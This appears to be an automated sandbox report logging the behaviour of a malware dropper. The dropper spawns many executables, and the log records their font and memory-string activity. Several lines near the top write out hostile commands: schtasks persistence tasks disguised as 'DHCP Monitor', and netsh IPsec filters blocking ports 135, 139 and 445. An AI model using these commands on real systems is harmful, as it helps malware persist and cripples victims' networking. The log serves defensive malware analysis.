                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe; Process created: C:\Users\user\AppData\Roaming\Pluto Panel.exe "C:\Users\user\AppData\Roaming\Pluto Panel.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe; Process created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe; Process created: C:\Users\user\AppData\Roaming\22.exe "C:\Users\user\AppData\Roaming\22.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe; Process created: C:\Users\user\AppData\Roaming\___11.19.exe "C:\Users\user\AppData\Roaming\___11.19.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\test.exe "C:\Users\user\AppData\Roaming\test.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\gay.exe "C:\Users\user\AppData\Roaming\gay.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\Opus.exe "C:\Users\user\AppData\Roaming\Opus.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\aaa.exe "C:\Users\user\AppData\Roaming\aaa.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\4.exe "C:\Users\user\AppData\Roaming\4.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe; Process created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe; Process created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\AppData\Roaming\gay.exe; Process created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe"
                    Source: C:\Users\user\AppData\Roaming\Opus.exe; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: C:\Users\user\AppData\Roaming\Opus.exe; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmp
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filterlist name=Filter1
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exe; Process created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\aaa.exe; Process created: C:\Users\user\AppData\Roaming\aaa.exe C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe; Process created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe; Process created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe; Process created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\4.exe; Process created: C:\Users\user\AppData\Roaming\3.exe "C:\Users\user\AppData\Roaming\3.exe"
                    Source: mediaget.exe, 00000011.00000002.705065903.0000000003315000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: program managerH
                    Source: Opus.exe, 00000009.00000002.706154944.000000000307A000.00000004.00000800.00020000.00000000.sdmp, Opus.exe, 00000009.00000002.706141297.0000000003078000.00000004.00000800.00020000.00000000.sdmp, Opus.exe, 00000009.00000002.702218807.0000000000F66000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Program Manager
                    Source: mediaget.exe, 00000011.00000002.705065903.0000000003315000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: program manager.
                    Source: mediaget.exe, 00000011.00000002.704209643.00000000032B1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: program manager
                    Source: mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: RhProgram Manager$
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe; Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
